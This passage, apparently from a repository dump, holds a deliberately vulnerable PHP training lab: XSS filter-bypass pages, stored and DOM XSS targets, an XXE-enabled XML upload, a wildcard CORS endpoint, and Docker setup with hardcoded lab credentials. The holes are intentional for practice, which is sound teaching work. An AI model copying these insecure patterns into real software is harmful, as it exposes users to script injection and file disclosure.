 9 | 	$ch = strpbrk($val, $illegal);
10 | 
11 | 	if( $ch ){
12 | 		echo "'XSS DETECTED'";
13 | 	}else{
14 | 		echo "'".$val."'";
15 | 	}
16 | }
17 | 
18 | ?>
19 | 
20 | <div id=xssMe></div>
21 | 
22 | <script type="text/javascript">
23 | 	document.getElementById('xssMe').innerHTML = <?php check($input);?>;
24 | </script>


--------------------------------------------------------------------------------
/labs/xss/XSS Fileters&Bypasses/xss2.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | # Bypass using eval
 4 | 
 5 | $input = $_GET['q'];
 6 | 
 7 | function check($val){
 8 | 	$f = preg_match_all('#(write|confirm|alert|prompt|src)#i', $GLOBALS['input']);
 9 | 	if($f)
10 | 		echo "XSS DETECTED";
11 | 	else
12 | 		echo $val;
13 | }
14 | 
15 | ?>
16 | 
17 | <div id=xssMe><?php check($input);?></div>
18 | 


--------------------------------------------------------------------------------
/labs/xss/XSS Fileters&Bypasses/xss3.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | # wirte valid syntax
 4 | 
 5 | $input = @$_GET['q'];
 6 | 
 7 | function check($val){
 8 | 	$finder = 0;
 9 | 	if($finder)
10 | 		echo "fixed value";
11 | 	else
12 | 		echo $val;
13 | }
14 | 
15 | ?>
16 | 
17 | <div id=xssMe></div>
18 | <script type="text/javascript">
19 | 	function vulnFunc(){
20 | 		var x = "<?php echo check($input);?>";
21 | 	}
22 | 
23 | 	document.getElementById('xssMe').innerHTML = "<h1>Dummy String</h1>"
24 | </script>


--------------------------------------------------------------------------------
/labs/xss/XSS Fileters&Bypasses/xss4.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | # Bypass using external js
 4 | 
 5 | $input = $_GET['q'];
 6 | 
 7 | function check($val){
 8 | 	echo strtoupper($val);
 9 | }
10 | 
11 | ?>
12 | 
13 | <div id=xssMe><?php echo check($input);?></div>


--------------------------------------------------------------------------------
/labs/xss/XSS Fileters&Bypasses/xss5.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | # Bypass CSP using jsonp
 4 | 
 5 | $headerCSP = "Content-Security-Policy: default-src 'self';script-src 'self';img-src 'self';object-src 'none';";
 6 | header($headerCSP);
 7 | 
 8 | $input = $_GET['q'];
 9 | 
10 | function check($val){
11 | 	
12 | 	echo $val;
13 | 
14 | }
15 | 
16 | ?>
17 | 
18 | <div id=xssMe><?php check($input);?></div>


--------------------------------------------------------------------------------
/labs/xss/XSS Fileters&Bypasses/xss6.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | # Bypass using operation [ - + * & ^ ]
 4 | 
 5 | $input = $_GET['q'];
 6 | 
 7 | function check($val){
 8 | 
 9 | 	$out = preg_replace("/[\%\[\],\{\}]/", "", $val);
10 | 	
11 | 	echo $out;
12 | 
13 | }
14 | 
15 | ?>
16 | 
17 | <script type="text/javascript">
18 | 	window.test={
19 | 		site: "test",
20 | 		page:{
21 | 			name: '<?php check($input);?>';
22 | 		}
23 | 	}
24 | </script>


--------------------------------------------------------------------------------
/labs/xss/about.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Library</title>
 4 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
 5 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 6 |   </head>
 7 |   <body id="bodyId">
 8 |     <div class="header">
 9 |       <a href="index.php" class="logo">Books Library</a>
10 |       <div class="header-right">
11 |         <a href="index.php">Home</a>
12 |         <a href="search.php">Search</a>
13 |         <a href="contact.php">Contact</a>
14 |         <a class="active" href="about.php#about">About</a>
15 |         <a href="profile.php">Profile</a>
16 |         <a href="login.php">Login</a>
17 |       </div>
18 |     </div>
19 |     <div>
20 |         <center>
21 |             <br><br><br><h2 id="type"></h2>
22 |         </center>
23 |     </div>
24 |     <script type="text/javascript">
25 | 
26 |         var source="This is "+decodeURIComponent(location.hash.split("#")[1])+" page.";
27 |         var h3 = document.getElementById("type");
28 |         h3.innerHTML = source;
29 |     </script>
30 |   </body>
31 | </html>


--------------------------------------------------------------------------------
/labs/xss/contact.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | if(!isset($_GET['lang'])){
 4 |   header("Location: contact.php?lang=en");
 5 | }
 6 | 
 7 | $conn = mysqli_connect('localhost', 'root', '', 'test');
 8 | 
 9 | if(isset($_POST['name']) && isset($_POST['email']) && isset($_POST['msg'])){
10 |   
11 |   $name = addslashes($_POST['name']);
12 |   $email = addslashes($_POST['email']);
13 |   $msg = addslashes($_POST['msg']);
14 |   $user_agent = addslashes($_SERVER['HTTP_USER_AGENT']);
15 | 
16 |   $sql = "INSERT INTO contact values('$name','$email','$msg','$user_agent')";
17 | 
18 |   $execute = mysqli_query($conn, $sql);
19 | 
20 |   echo "<script>alert('Your message sent to Admin.')</script>";
21 | }
22 | ?>
23 | 
24 | <html>
25 |   <head>
26 |     <title>Books Library</title>
27 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
28 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
29 |     <!-- <link rel="stylesheet" type="text/css" href="../style/<?php echo @$_GET['lang'];?>.lang"> -->
30 |   </head>
31 |   <body id="bodyId">
32 |     <div class="header">
33 |       <a href="index.php" class="logo">Books Library</a>
34 |       <div class="header-right">
35 |         <a href="index.php">Home</a>
36 |         <a href="search.php">Search</a>
37 |         <a class="active" href="contact.php">Contact</a>
38 |         <a href="about.php#about">About</a>
39 |         <a href="profile.php">Profile</a>
40 |         <a href="login.php">Login</a>
41 |       </div>
42 |     </div>
43 |     <div><br><br><br><br>
44 |     <center>
45 |         <form method="post" action="contact.php?lang=en">
46 | 
47 |         	<input id="fname" type="text" name="name" autocomplete="off" placeholder="Your Name"><br>
48 | 
49 |         	<input id="email" type="email" name="email" autocomplete="off" placeholder="Email"><br>
50 | 
51 |         	<textarea id="msg" name="msg" autocomplete="off" placeholder="Message"></textarea><br>
52 |         	<input id="send" type="submit" value="Send">
53 | 
54 |         </form>
55 |     </center>
56 |     </div>
57 |     <script type="text/javascript">
58 |         var lang = <?php echo '"'.@$_GET['lang'].'";';?>
59 |     </script>
60 |   </body>
61 | </html>


--------------------------------------------------------------------------------
/labs/xss/index.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Library</title>
 4 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
 5 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 6 |   </head>
 7 |   <body id="bodyId">
 8 |     <div class="header">
 9 |       <a href="index.php" class="logo">Books Library</a>
10 |       <div class="header-right">
11 |         <a class="active" href="index.php">Home</a>
12 |         <a href="search.php">Search</a>
13 |         <a href="contact.php">Contact</a>
14 |         <a href="about.php#about">About</a>
15 |         <a href="profile.php">Profile</a>
16 |         <a href="login.php">Login</a>
17 |       </div>
18 |     </div>
19 |     <div>
20 |         <center>
21 |             <br><br><br><h3 id="type"></h3>
22 |         </center>
23 |     </div>
24 |     <script type="text/javascript">
25 |         var msg = "Welcome To our website.We will servie you as best as we can, if you have any issue send to us.",
26 |             i=0,
27 |             body=document.getElementById('bodyId');
28 |         body.onload = function(){
29 |             'use strict';
30 |             var typeWriter = setInterval(function(){
31 | 
32 |                 document.getElementById('type').innerHTML += msg[i];
33 |                 i = i + 1;
34 | 
35 |                 if(i>msg.length-1){
36 |                     clearInterval(typeWriter)
37 |                 }
38 |             }, 100);
39 |         }
40 |     </script>
41 |   </body>
42 | </html>


--------------------------------------------------------------------------------
/labs/xss/login.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | if(isset($_POST['uname']) && isset($_POST['pwd'])){
 4 | 	if($_POST['uname'] == "guest" && $_POST['pwd'] == "guest123") {
 5 | 		$_SESSION['islogin'] = 1;
 6 | 		$_SESSION['username'] = $_POST['uname'];
 7 | 		header("Location: profile.php");
 8 | 	}else{
 9 | 		echo "<script>alert('Username/Password is invalid.')</script>";
10 | 	}
11 | }
12 | ?>
13 | <html>
14 |   <head>
15 |     <title>Books Library</title>
16 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
17 |   </head>
18 |   <body id="bodyId">
19 |     <div class="header">
20 |       <a href="index.php" class="logo">Books Library</a>
21 |       <div class="header-right">
22 |         <a href="index.php">Home</a>
23 |         <a href="search.php">Search</a>
24 |         <a href="contact.php">Contact</a>
25 |         <a href="about.php#about">About</a>
26 |         <a href="profile.php">Profile</a>
27 |         <a class="active" href="login.php">Login</a>
28 |       </div>
29 |     </div>
30 |     <div><br><br>
31 |     	<center>
32 |     	<form method="POST">
33 |     		<input type="text" id="uname" name="uname" placeholder="Username" autocomplete="off"><br>
34 |     		<input type="password" id="pwd" name="pwd" placeholder="Password" autocomplete="off"><br>
35 |     		<input type="submit" value="Login" style="background-color: dodgerblue;">
36 |     	</form>
37 |     	</center>
38 |     </div>
39 |   </body>
40 | </html>


--------------------------------------------------------------------------------
/labs/xss/profile.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | if($_SESSION['islogin'] != 1){
 5 |     header("Location: login.php");
 6 |     die();
 7 | }
 8 | 
 9 | $conn = mysqli_connect('localhost', 'root', '', 'test');
10 | 
11 | if( isset($_POST['link']) && isset($_POST['comment']) ){
12 |     $uname = htmlentities($_SESSION['username']);
13 |     $comment = htmlentities($_POST['comment']);
14 |     $link = "#";
15 |     if(strpos($_POST['link'], 'http://') !== false || strpos($_POST['link'], 'https://') !== false){
16 |         $link = $_POST['link'];
17 |     }
18 |     $sql = "INSERT INTO comments values('$uname','$comment','$link')";
19 |     $res = mysqli_query($conn, $sql);
20 | }
21 | 
22 | $sql = "SELECT * FROM comments";
23 | 
24 | $result = mysqli_query($conn, $sql);
25 | 
26 | ?>
27 | 
28 | <html>
29 |   <head>
30 |     <title>Books Library</title>
31 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
32 |   </head>
33 |   <body id="bodyId">
34 |     <div class="header">
35 |       <a href="index.php" class="logo">Books Library</a>
36 |       <div class="header-right">
37 |         <a href="index.php">Home</a>
38 |         <a href="search.php">Search</a>
39 |         <a href="contact.php">Contact</a>
40 |         <a href="about.php#about">About</a>
41 |         <a class="active" href="profile.php">Profile</a>
42 |         <a href="login.php">Login</a>
43 |       </div>
44 |     </div>
45 |     
46 |     <div class="container">
47 |     <div class="be-comment-block">
48 |         <div class="be-comment">
49 |         <?php
50 | while($rows=mysqli_fetch_array($result)){
51 |     echo '<span class="be-comment-name">';
52 |     echo '<a href="'.$rows['link'].'">'.$rows['uname'].'</a></span>';
53 |     echo '<p class="be-comment-text">'.$rows['comment'].'</p>';
54 |     echo '</div>';
55 | }
56 |         ?>
57 |         </div>
58 |         <form class="form-block" method="post">
59 |             <div class="row">
60 |                 <div class="col-xs-12">                         
61 |                     <div class="form-group">
62 |                         <textarea name="comment" class="form-input" required="" placeholder="Your text"></textarea><br>
63 |                         <input placeholder="Link" style="width: 400px;border: 1px solid #000;border-radius: 3px;" type="text" name="link" autocomplete="off">
64 |                     </div>
65 |                 </div>
66 |                 <input style="width: 100px;" type="submit" value="Comment">
67 |             </div>
68 |         </form>
69 |     </div>
70 |     </div>
71 |   </body>
72 | </html>


--------------------------------------------------------------------------------
/labs/xss/search.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Application</title>
 4 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
 5 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 6 |   </head>
 7 |   <body>
 8 |     <div class="header">
 9 |       <a href="index.php" class="logo">Books Library</a>
10 |       <div class="header-right">
11 |         <a href="index.php">Home</a>
12 |         <a class="active" href="search.php">Search</a>
13 |         <a href="contact.php">Contact</a>
14 |         <a href="about.php#about">About</a>
15 |         <a href="profile.php">Profile</a>
16 |         <a href="login.php">Login</a>
17 |       </div>
18 |     </div><br><br><br><br>
19 |     <center>
20 |         <form method="get">
21 |             <label>Name:</label>
22 |             <input type="text" id="name" name="u" placeholder="Enter a name here" autocomplete="off">
23 |             <input type="submit" id="search" value="search">
24 |         </form>
25 |     <div ng-app>
26 |         <p id="printOut">
27 |             <?php 
28 |             if(isset($_GET['u'])){
29 |                 echo "There is no result for: <b>".htmlspecialchars($_GET['u'])."</b>";
30 |             }
31 |             ?>
32 |         </p>
33 |     </div>
34 |     </center>
35 |   </body>
36 | </html>


--------------------------------------------------------------------------------
/labs/xss/secret/admin_panel.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | setcookie("sessionid","21232f297a57a5a743894a0e4a801fc3",time()+3600,"../secret/");
 4 | 
 5 | $conn = mysqli_connect("localhost","root","","test");
 6 | 
 7 | $sql = "SELECT * FROM contact";
 8 | 
 9 | $result = mysqli_query($conn, $sql);
10 | 
11 | ?>
12 | 
13 | <html>
14 |   <head>
15 |     <title>Books Library</title>
16 |     <link rel="stylesheet" type="text/css" href="../../style/css.css">
17 |   </head>
18 |   <body id="bodyId">
19 |     <div class="header">
20 |       <a href="index.php" class="logo">Books Library</a>
21 |       <div class="header-right">
22 |         <a href="../index.php">Home</a>
23 |         <a href="../search.php">Search</a>
24 |         <a href="../contact.php">Contact</a>
25 |         <a href="../about.php#about">About</a>
26 |         <a href="../profile.php">Profile</a>
27 |         <a href="../login.php">Login</a>
28 |       </div>
29 |     </div>
30 |     
31 |     <div class="container">
32 |     <div class="be-comment-block">
33 |     	<div class="be-comment">
34 |         <?php
35 |         while($rows=mysqli_fetch_array($result)){
36 |             echo '<span class="be-comment-name">';
37 |             echo '<a>'.$rows['name'].'</a>';
38 |             echo '<br><a>'.$rows['email'].'</a>';
39 |             echo '<br><input type="hidden" value="'.$rows['user_agent'].'">';
40 |             echo '</span>';
41 |             echo '<p class="be-comment-text">'.$rows['message'].'</p>';
42 |             echo '</div>';
43 |         }
44 |         ?>
45 |     </div>
46 |     </div>
47 |     </div>
48 |   </body>
49 | </html>


--------------------------------------------------------------------------------
/labs/xxe/check.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | // libxml_disable_entity_loader(true);
 5 | 
 6 | $xm = file_get_contents("php://input");
 7 | $dom = new DOMDocument();
 8 | $dom->loadXML($xm, LIBXML_NOENT | LIBXML_DTDLOAD);
 9 | $login = simplexml_import_dom($dom);
10 | $user = $login->user;
11 | $pass = $login->pass;
12 | 
13 | if( $user == "guest" && $pass == "guest" ){
14 | 	$_SESSION['islogin'] = 1;
15 | 	$_SESSION['username'] = $user;
16 | 	header("Location: profile.php");
17 | }else{
18 | 	echo "t";
19 | }


--------------------------------------------------------------------------------
/labs/xxe/index.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Library</title>
 4 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 5 |   </head>
 6 |   <body id="bodyId">
 7 |     <div class="header">
 8 |       <a href="index.php" class="logo">Books Library</a>
 9 |       <div class="header-right">
10 |         <a class="active" href="index.php">Home</a>
11 |         <a href="profile.php">Profile</a>
12 |         <a href="login.php">Login</a>
13 |       </div>
14 |     </div>
15 |     <div>
16 |         <center>
17 |             <br><br><br><h3 id="type"></h3>
18 |         </center>
19 |     </div>
20 |     <script type="text/javascript">
21 |         var msg = "Welcome To our website.We will servie you as best as we can, if you have any issue send to us.",
22 |             i=0,
23 |             body=document.getElementById('bodyId');
24 |         body.onload = function(){
25 |             'use strict';
26 |             var typeWriter = setInterval(function(){
27 | 
28 |                 document.getElementById('type').innerHTML += msg[i];
29 |                 i = i + 1;
30 | 
31 |                 if(i>msg.length-1){
32 |                     clearInterval(typeWriter)
33 |                 }
34 |             }, 100);
35 |         }
36 |     </script>
37 |   </body>
38 | </html>


--------------------------------------------------------------------------------
/labs/xxe/login.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | if(isset($_POST['uname']) && isset($_POST['pwd'])){
 5 |   if($_POST['uname'] == "guest" && $_POST['pwd'] == "guest123") {
 6 |     $_SESSION['islogin'] = 1;
 7 |     $_SESSION['username'] = $_POST['uname'];
 8 |     header("Location: profile.php");
 9 |   }else{
10 |     echo "<script>alert('Username/Password is invalid.')</script>";
11 |   }
12 | }
13 | 
14 | 
15 | ?>
16 | <html>
17 |   <head>
18 |     <title>Books Library</title>
19 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
20 |   </head>
21 |   <body id="bodyId">
22 |     <div class="header">
23 |       <a href="index.php" class="logo">Books Library</a>
24 |       <div class="header-right">
25 |         <a href="index.php">Home</a>
26 |         <a href="profile.php">Profile</a>
27 |         <a class="active" href="login.php">Login</a>
28 |       </div>
29 |     </div>
30 |     <div><br><br>
31 |       <center>
32 |       <form method="POST">
33 |         <input type="text" id="uname" name="uname" placeholder="Username" autocomplete="off"><br>
34 |         <input type="password" id="pwd" name="pwd" placeholder="Password" autocomplete="off"><br>
35 |         <input type="submit" value="Login" style="background-color: dodgerblue;">
36 |       </form>
37 |       </center>
38 |     </div>
39 |   </body>
40 | </html>


--------------------------------------------------------------------------------
/labs/xxe/profile.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | 
  3 | session_start();
  4 | 
  5 | if($_SESSION['islogin'] != 1){
  6 |     header("Location: login.php");
  7 |     die();
  8 | }
  9 | 
 10 | $blind = 1;
 11 | $msg = " ";
 12 | $user = "";
 13 | $email = "";
 14 | $role ="";
 15 | $output ="";
 16 | 
 17 | if( isset( $_FILES[ 'upload' ] ) ) {
 18 | 
 19 |     $target_dir  = __DIR__ . "/files/";
 20 |     $target_file = basename( $_FILES[ 'upload' ][ 'name' ] );
 21 |     $target_ext  = substr( $target_file, strrpos( $target_file, '.' ) + 1);
 22 |     $target_path = $target_dir . $target_file;
 23 | 
 24 |     $allowed = array('xml');
 25 | 
 26 |     if( !in_array($target_ext, $allowed) ){
 27 |         
 28 |         $msg .= "Not allowd Extension, try XML file.";
 29 | 
 30 |     }else{
 31 |         if(!file_exists($target_path)){
 32 |             if( !move_uploaded_file( $_FILES[ 'upload' ][ 'tmp_name' ], $target_path ) ) {
 33 |             // No
 34 |                 $msg .= 'Your file was not accepted.';
 35 |             }
 36 |             else {
 37 |                 // Yes!
 38 |                 $msg = "";
 39 |                 // libxml_disable_entity_loader(true);
 40 |                 if( $blind == 0 ){
 41 |                 	$myfile = fopen($target_path, "r");
 42 | 	                $content = fread($myfile, filesize($target_path));
 43 | 	                $xm = $content;
 44 | 					$dom = new DOMDocument();
 45 | 					@$dom->loadXML($xm, LIBXML_NOENT | LIBXML_DTDLOAD);
 46 | 					$userInfo = @simplexml_import_dom($dom);
 47 | 					$user = @$userInfo->user;
 48 | 					$email = @$userInfo->email;
 49 | 					$role = @$userInfo->role;
 50 | 					$output = "<p>User Name: $user</p><p>Email: $email</p><p>Role: $role</p>";
 51 | 				}else{
 52 | 					$myfile = fopen($target_path, "r");
 53 | 	                $content = fread($myfile, filesize($target_path));
 54 | 	                $xm = $content;
 55 | 					$dom = new DOMDocument();
 56 | 					try{
 57 | 						@$dom->loadXML($xm, LIBXML_NOENT | LIBXML_DTDLOAD);
 58 | 					}catch (Exception $e){
 59 | 						echo "There is error in: ". $e->getMessage() . '\n';
 60 | 					}
 61 | 					$userInfo = @simplexml_import_dom($dom);
 62 | 					$output = "User Sucessfully Added.";
 63 | 				}
 64 | 				unlink($target_path);
 65 |             }
 66 |         }else{
 67 |             $msg .= "File already exists.";
 68 |         }
 69 |     }
 70 | }
 71 | ?>
 72 | 
 73 | <html>
 74 |   <head>
 75 |     <title>Books Library</title>
 76 |     <link rel="stylesheet" type="text/css" href="../style/css.css">
 77 |   </head>
 78 |   <body id="bodyId">
 79 |     <div class="header">
 80 |       <a href="index.php" class="logo">Books Library</a>
 81 |       <div class="header-right">
 82 |         <a href="index.php">Home</a>
 83 |         <a class="active" href="profile.php">Profile</a>
 84 |         <a href="login.php">Login</a>
 85 |       </div>
 86 |     </div>
 87 | 
 88 |     <div class="container">
 89 |         <form class="form-block" method="post" enctype="multipart/form-data">
 90 |             <input type="file" name="upload">
 91 |             <input type="submit" value="upload">
 92 |         </form>
 93 |         <pre>
 94 |         	<?php 
 95 |         	if($msg != "")
 96 |         		echo htmlentities($msg);
 97 |         	else{
 98 |         		echo $output;
 99 |         	}
100 |         	?>
101 |         </pre>
102 |     </div>
103 |   </body>
104 | </html>


--------------------------------------------------------------------------------
/labs_docker/Dockerfile:
--------------------------------------------------------------------------------
 1 | # you can change the name and port.
 2 | # docker build . -t labs_docker && docker run -p 80:80 -t labs_docker
 3 | 
 4 | FROM 1275178869/base_image_apache_php_mysql:sjx 
 5 | 
 6 | USER root
 7 | 
 8 | 
 9 | RUN apt-get -y update
10 | RUN apt-get install -y python3-dev python3-pip && rm /var/www/html/index.html
11 | 
12 | 
13 | COPY src /var/www/html
14 | 
15 | COPY db.sql /docker-entrypoint-initdb.d
16 | COPY apache.conf /usr/local/apache2/conf/apache.conf
17 | RUN echo "Include /usr/local/apache2/conf/apache.conf" \
18 |     >> /usr/local/apache2/conf/httpd.conf
19 | 
20 | RUN chmod 777 /var/www/html/userfiles/
21 | 
22 | EXPOSE 80
23 | 
24 | CMD ["apachectl", "-D", "FOREGROUND"]
25 | 
26 | COPY main.sh /
27 | RUN chmod +x /main.sh
28 | ENTRYPOINT ["/main.sh"]
29 | 


--------------------------------------------------------------------------------
/labs_docker/apache.conf:
--------------------------------------------------------------------------------
 1 | ServerName localhost
 2 | 
 3 | LoadModule deflate_module /usr/local/apache2/modules/mod_deflate.so
 4 | LoadModule proxy_module /usr/local/apache2/modules/mod_proxy.so
 5 | LoadModule proxy_fcgi_module /usr/local/apache2/modules/mod_proxy_fcgi.so
 6 | 
 7 | <VirtualHost *:80>
 8 |     # Proxy .php requests to port 9000 of the php-fpm container
 9 |     ProxyPassMatch ^/(.*\.php(/.*)?)$ fcgi://php:9000/var/www/html/$1
10 | 
11 |     DocumentRoot /var/www/html/
12 |     <Directory /var/www/html/>
13 |         DirectoryIndex index.php
14 |         Options Indexes FollowSymLinks
15 |         AllowOverride All
16 |         Require all granted
17 |     </Directory>
18 |     
19 |     
20 |     # Send apache logs to stdout and stderr
21 |     CustomLog /proc/self/fd/1 common
22 |     ErrorLog /proc/self/fd/2
23 | </VirtualHost>
24 | 


--------------------------------------------------------------------------------
/labs_docker/db.sql:
--------------------------------------------------------------------------------
 1 | -- phpMyAdmin SQL Dump
 2 | -- version 4.5.5.1
 3 | -- http://www.phpmyadmin.net
 4 | --
 5 | -- Host: 127.0.0.1
 6 | -- Generation Time: Sep 03, 2019 at 12:40 PM
 7 | -- Server version: 5.7.11
 8 | -- PHP Version: 7.0.4
 9 | 
10 | CREATE USER 'ctfuser'@'localhost' IDENTIFIED BY 'P@sswp@@1';
11 | CREATE DATABASE labs_db;
12 | GRANT ALL PRIVILEGES ON labs_db.* TO 'ctfuser'@'localhost';
13 | USE labs_db;
14 | 
15 | SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO";
16 | SET time_zone = "+00:00";
17 | 
18 | 
19 | /*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
20 | /*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
21 | /*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
22 | /*!40101 SET NAMES utf8mb4 */;
23 | 
24 | --
25 | -- Database: `labs_db`
26 | --
27 | 
28 | -- --------------------------------------------------------
29 | 
30 | 
31 | -- Create the comments table and insert dummy values
32 | CREATE TABLE comments (
33 |     uname VARCHAR(50),
34 |     comment TEXT,
35 |     link VARCHAR(255)
36 | );
37 | 
38 | INSERT INTO comments (uname, comment, link) VALUES
39 | ('user1', 'This is a comment', 'http://example.com'),
40 | ('user2', 'Another comment', 'http://example.org');
41 | 
42 | -- Create the books table and insert dummy values
43 | CREATE TABLE books (
44 |     name VARCHAR(100),
45 |     author VARCHAR(100),
46 |     story TEXT
47 | );
48 | 
49 | INSERT INTO books (name, author, story) VALUES
50 | ('Book One', 'Author One', 'Story of book one'),
51 | ('Book Two', 'Author Two', 'Story of book two');
52 | 
53 | -- Create the contact table
54 | CREATE TABLE contact (
55 |     name VARCHAR(100),
56 |     email VARCHAR(100),
57 |     message TEXT,
58 |     user_agent VARCHAR(255)
59 | );
60 | 
61 | -- Create the users table and insert a dummy user
62 | CREATE TABLE users (
63 |     username VARCHAR(50),
64 |     pass VARCHAR(50)
65 | );
66 | 
67 | INSERT INTO users (username, pass) VALUES
68 | ('guest', 'guest');
69 | INSERT INTO users (username, pass) VALUES
70 | ('admin', 'Passw0rd');
71 | INSERT INTO users (username, pass) VALUES
72 | ('noBody', 'yesNoOne');
73 | 
74 | -- Create the users_csrf table and insert a dummy user
75 | CREATE TABLE users_csrf (
76 |     username VARCHAR(50),
77 |     email VARCHAR(100),
78 |     password VARCHAR(50)
79 | );
80 | 
81 | INSERT INTO users_csrf (username, email, password) VALUES
82 | ('guest', 'guest@example.com', 'guest');
83 | ('admin', 'admin@example.com', 'PasswordAdmin');
84 | ('nobody', 'nobody@example.com', 'yesWeHack');
85 | 


--------------------------------------------------------------------------------
/labs_docker/main.sh:
--------------------------------------------------------------------------------
 1 | #!/bin/bash
 2 | 
 3 | echo '[+] Starting apache'
 4 | 
 5 | service apache2 start
 6 | 
 7 | echo '[+] Starting mysql'
 8 | service mysql start
 9 | # for sanity check
10 | mysql -uroot -proot < /docker-entrypoint-initdb.d
11 | 
12 | while true
13 | do
14 |     tail -f /var/log/apache2/*.log
15 |     exit 0
16 | done
17 | 


--------------------------------------------------------------------------------
/labs_docker/src/config.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | # 8889
 3 | # 3306
 4 | 
 5 | $username = "ctfuser";
 6 | $password = "P@sswp@@1";
 7 | $db = 'labs_db';
 8 | 
 9 | $conn = mysqli_connect(
10 |   '127.0.0.1', # service name
11 |   $username, # username
12 |   $password, # password
13 |   $db # db table
14 | );
15 | 
16 | // Check connection
17 | if ($conn->connect_error) {
18 |   die("Connection failed: " . $conn->connect_error);
19 | }
20 | 
21 | echo "Connected successfully";
22 | 


--------------------------------------------------------------------------------
/labs_docker/src/cors/index.php:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>Books Library</title>
 4 |     <script src="https://code.angularjs.org/1.1.5/angular.min.js"></script>
 5 |     <link rel="stylesheet" type="text/css" href="style/css.css">
 6 |   </head>
 7 |   <body id="bodyId">
 8 |     <div class="header">
 9 |       <a href="index.php" class="logo">Books Library</a>
10 |       <div class="header-right">
11 |         <a class="active" href="index.php">Home</a>
12 |         <a href="profile.php">Profile</a>
13 |         <a href="login.php">Login</a>
14 |       </div>
15 |     </div>
16 |     <div>
17 |         <center>
18 |             <br><br><br><h3 id="type"></h3>
19 |         </center>
20 |     </div>
21 |     <script type="text/javascript">
22 |         var msg = "Welcome To our website.We will servie you as best as we can, if you have any issue send to us.",
23 |             i=0,
24 |             body=document.getElementById('bodyId');
25 |         body.onload = function(){
26 |             'use strict';
27 |             var typeWriter = setInterval(function(){
28 | 
29 |                 document.getElementById('type').innerHTML += msg[i];
30 |                 i = i + 1;
31 | 
32 |                 if(i>msg.length-1){
33 |                     clearInterval(typeWriter)
34 |                 }
35 |             }, 100);
36 |         }
37 |     </script>
38 |   </body>
39 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/cors/info.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | 
 4 | if($_SESSION['islogin'] != 1){
 5 | 	header("Location: login.php");
 6 | 	die();
 7 | }
 8 | 
 9 | $origin = "mydomain.com";
10 | if ( strpos(@$_SERVER['HTTP_ORIGIN'], "mydomain.com") ){
11 | 	$origin = @$_SERVER['HTTP_ORIGIN'];
12 | }
13 | 
14 | header("Content-Type: application/json");
15 | header("Access-Control-Allow-Origin: *");
16 | header("Access-Control-Allow-Credentials: true");
17 | 
18 | echo '{"name":"Guest user", "phone number":"0234235","email":"email@gmail.com","adddress":"street 3","own books":["Book one","Book two","Book three"],"private books":["book 4","book 5"]}';


--------------------------------------------------------------------------------
/labs_docker/src/cors/login.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | session_start();
 3 | if(isset($_POST['uname']) && isset($_POST['pwd'])){
 4 | 	if($_POST['uname'] == "guest" && $_POST['pwd'] == "guest") {
 5 | 		$_SESSION['islogin'] = 1;
 6 | 		$_SESSION['username'] = $_POST['uname'];
 7 | 		header("Location: profile.php");
 8 | 	}else{
 9 | 		echo "<script>alert('Username/Password is invalid.')</script>";
10 | 	}
11 | }
12 | ?>
13 | <html>
14 |   <head>
15 |     <title>Books Library</title>
16 |     <link rel="stylesheet" type="text/css" href="style/css.css">
17 |   </head>
18 |   <body id="bodyId">
19 |     <div class="header">
20 |       <a href="index.php" class="logo">Books Library</a>
21 |       <div class="header-right">
22 |         <a href="index.php">Home</a>
23 |         <a href="profile.php">Profile</a>
24 |         <a class="active" href="login.php">Login</a>
25 |       </div>
26 |     </div>
27 |     <div><br><br>
28 |     	<center>
29 |     	<form method="POST">
30 |     		<input type="text" id="uname" name="uname" placeholder="Username" autocomplete="off"><br>
31 |     		<input type="password" id="pwd" name="pwd" placeholder="Password" autocomplete="off"><br>
32 |     		<input type="submit" value="Login" style="background-color: dodgerblue;">
33 |     	</form>
34 |     	</center>
35 |     </div>
36 |   </body>
37 | </html>


--------------------------------------------------------------------------------
/labs_docker/src/cors/profile.php:
--------------------------------------------------------------------------------
 1 | <?php
 2 | 
 3 | session_start();
 4 | 
 5 | if($_SESSION['islogin'] != 1){
 6 |     header("Location: login.php");
